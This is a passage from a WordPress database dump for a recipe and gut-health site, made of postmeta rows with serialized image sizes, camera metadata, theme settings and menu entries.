_2185-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"MG_2185-scaled-600x861.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:861;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"MG_2185-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1441535222\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12731,5063,'_wp_attached_file','2020/04/Kale-pesto-2small.jpg'),(12732,5063,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1500;s:4:\"file\";s:29:\"2020/04/Kale-pesto-2small.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"Kale-pesto-2small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Kale-pesto-2small-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Kale-pesto-2small-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Kale-pesto-2small-1000x550.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"Kale-pesto-2small-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"Kale-pesto-2small-1000x1100.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"Kale-pesto-2small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Kale-pesto-2small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205891\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12735,5060,'_thumbnail_id','5021'),(12736,5060,'_edit_last','1'),(12739,5060,'qodef_page_content_behind_header_meta','no'),(12740,5060,'qodef_boxed_background_image_attachment_meta','fixed'),(12741,5060,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(12742,5060,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(12743,5060,'qodef_video_type_meta','social_networks'),(12744,5060,'qodef_audio_type_meta','social_networks'),(12745,5060,'qodef_post_skin','qodef-post-light-skin'),(12746,5060,'qodef_disable_vertical_header_background_image_meta','no'),(12747,5060,'qodef_disable_header_widget_logo_area_meta','no'),(12748,5060,'qodef_disable_header_widget_menu_area_meta','no'),(12749,5060,'slide_template','default'),(12750,5060,'rs_page_bg_color','#ffffff'),(12751,5065,'_edit_lock','1586729782:1'),(12752,5065,'_edit_last','1'),(12753,5065,'qodef_page_content_behind_header_meta','no'),(12754,5065,'qodef_boxed_background_image_attachment_meta','fixed'),(12755,5065,'qodef_disable_vertical_header_background_image_meta','no'),(12756,5065,'qodef_disable_header_widget_logo_area_meta','no'),(12757,5065,'qodef_disable_header_widget_menu_area_meta','no'),(12758,5065,'slide_template','default'),(12759,5065,'rs_page_bg_color','#ffffff'),(12772,3776,'_edit_last','1'),(12773,3776,'rs_page_bg_color','#ffffff'),(12776,4659,'_wp_old_date','2020-04-13'),(12780,4652,'_wp_old_date','2020-04-13'),(12784,4656,'_wp_old_date','2020-04-13'),(12789,4662,'_wp_old_date','2020-04-13'),(12793,4664,'_wp_old_date','2020-04-13'),(12796,4666,'_wp_old_date','2020-04-13'),(12800,4668,'_wp_old_date','2020-04-13'),(12804,4670,'_wp_old_date','2020-04-13'),(12808,4672,'_wp_old_date','2020-04-13'),(12812,4674,'_wp_old_date','2020-04-13'),(12817,4678,'_wp_old_date','2020-04-13'),(12822,4676,'_wp_old_date','2020-04-13'),(12826,4697,'_wp_old_date','2020-04-13'),(12830,4701,'_wp_old_date','2020-04-13'),(12834,4703,'_wp_old_date','2020-04-13'),(12838,4704,'_wp_old_date','2020-04-13'),(12843,4707,'_wp_old_date','2020-04-13'),(12846,5070,'_menu_item_type','custom'),(12847,5070,'_menu_item_menu_item_parent','0'),(12848,5070,'_menu_item_object_id','5070'),(12849,5070,'_menu_item_object','custom'),(12850,5070,'_menu_item_target',''),(12851,5070,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12852,5070,'_menu_item_xfn',''),(12853,5070,'_menu_item_url','http://tummyrevolution.com/'),(12859,1492,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1075;s:6:\"height\";i:2560;s:4:\"file\";s:39:\"2018/01/h8-background-img-11-scaled.jpg\";s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h8-background-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-background-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"h8-background-img-11-600x1429.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1429;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:24:\"h8-background-img-11.jpg\";}'),(12863,5074,'_edit_lock','1586734377:1'),(12864,5074,'_edit_last','1'),(12865,5074,'qodef_page_content_behind_header_meta','no'),(12866,5074,'qodef_boxed_background_image_attachment_meta','fixed'),(12867,5074,'qodef_disable_vertical_header_background_image_meta','no'),(12868,5074,'qodef_disable_header_widget_logo_area_meta','no'),(12869,5074,'qodef_disable_header_widget_menu_area_meta','no'),(12870,5074,'slide_template','default'),(12871,5074,'rs_page_bg_color','#ffffff'),(12890,5079,'_menu_item_type','custom'),(12891,5079,'_menu_item_menu_item_parent','0'),(12892,5079,'_menu_item_object_id','5079'),(12893,5079,'_menu_item_object','custom'),(12894,5079,'_menu_item_target',''),(12895,5079,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12896,5079,'_menu_item_xfn',''),(12897,5079,'_menu_item_url','http://tummyrevolution.com/free-resources/'),(12960,5091,'_menu_item_type','post_type'),(12961,5091,'_menu_item_menu_item_parent','0'),(12962,5091,'_menu_item_object_id','3776'),(12963,5091,'_menu_item_object','page'),(12964,5091,'_menu_item_target',''),(12965,5091,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12966,5091,'_menu_item_xfn',''),(12967,5091,'_menu_item_url',''),(12996,5097,'_menu_item_type','post_type'),(12997,5097,'_menu_item_menu_item_parent','0'),(12998,5097,'_menu_item_object_id','4863'),(12999,5097,'_menu_item_object','page'),(13000,5097,'_menu_item_target',''),(13001,5097,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13002,5097,'_menu_item_xfn',''),(13003,5097,'_menu_item_url',''),(13007,5099,'_menu_item_type','post_type'),(13008,5099,'_menu_item_menu_item_parent','0'),(13009,5099,'_menu_item_object_id','4863'),(13010,5099,'_menu_item_object','page'),(13011,5099,'_menu_item_target',''),(13012,5099,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13013,5099,'_menu_item_xfn',''),(13014,5099,'_menu_item_url',''),(13015,5100,'_menu_item_type','post_type'),(13016,5100,'_menu_item_menu_item_parent','0'),(13017,5100,'_menu_item_object_id','3776'),(13018,5100,'_menu_item_object','page'),(13019,5100,'_menu_item_target',''),(13020,5100,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13021,5100,'_menu_item_xfn',''),(13022,5100,'_menu_item_url',''),(13046,1117,'qodef_page_slider_meta','[vc_row row_content_width=\"grid\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"recipe\"][/vc_column][/vc_row]'),(13047,5111,'_wp_attached_file','2020/04/orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x.jpg'),(13048,5111,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:76:\"2020/04/orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:76:\"orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480761825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13051,4674,'_thumbnail_id','5014'),(13100,4723,'_wp_old_slug','gluten-free-diet-or-low-fodmap-diet-2__trashed'),(13110,4723,'_wp_old_slug','gluten-free-diet-or-low-fodmap-diet-2'),(13125,5112,'_wp_attached_file','2020/04/untitled.png'),(13126,5112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2020/04/untitled.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"untitled-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"untitled-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"untitled-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"untitled-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"untitled-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"untitled-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"untitled-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"untitled-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"untitled-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13130,4698,'_wp_old_date','2020-04-13'),(13167,4863,'qodef_title_area_background_image_behavior_meta','hide'),(13172,5125,'_edit_lock','1587277697:1'),(13173,5125,'_edit_last','1'),(13174,5125,'qodef_page_content_behind_header_meta','no'),(13175,5125,'qodef_boxed_background_image_attachment_meta','fixed'),(13176,5125,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(13177,5125,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(13178,5125,'qodef_video_type_meta','social_networks'),(13179,5125,'qodef_audio_type_meta','social_networks'),(13180,5125,'qodef_post_skin','qodef-post-light-skin'),(13181,5125,'qodef_disable_vertical_header_background_image_meta','no'),(13182,5125,'qodef_disable_header_widget_logo_area_meta','no'),(13183,5125,'qodef_disable_header_widget_menu_area_meta','no'),(13184,5125,'slide_template','default'),(13185,5125,'rs_page_bg_color','#ffffff'),(13190,5125,'_wp_page_template','default'),(13202,5125,'_thumbnail_id','5267'),(13233,4713,'_wp_old_date','2020-04-05'),(13236,5130,'_wp_attached_file','2020/04/smoothie1-scaled.jpg'),(13237,5130,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:28:\"2020/04/smoothie1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"smoothie1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"smoothie1-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"smoothie1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"smoothie1-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"smoothie1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"smoothie1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"smoothie1-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:23:\"smoothie1-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"smoothie1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"smoothie1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"smoothie1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"smoothie1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"smoothie1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"smoothie1-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"smoothie1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"smoothie1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"smoothie1-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"smoothie1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1430814599\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:13:\"smoothie1.jpg\";}'),(13238,5131,'_wp_attached_file','2020/04/smoothie-Noah.jpg'),(13239,5131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:25:\"2020/04/smoothie-Noah.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"smoothie-Noah-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"smoothie-Noah-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:26:\"smoothie-Noah-1100x800.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"smoothie-Noah-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"smoothie-Noah-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13242,4819,'_wp_old_date','2020-04-05'),(13243,4819,'_thumbnail_i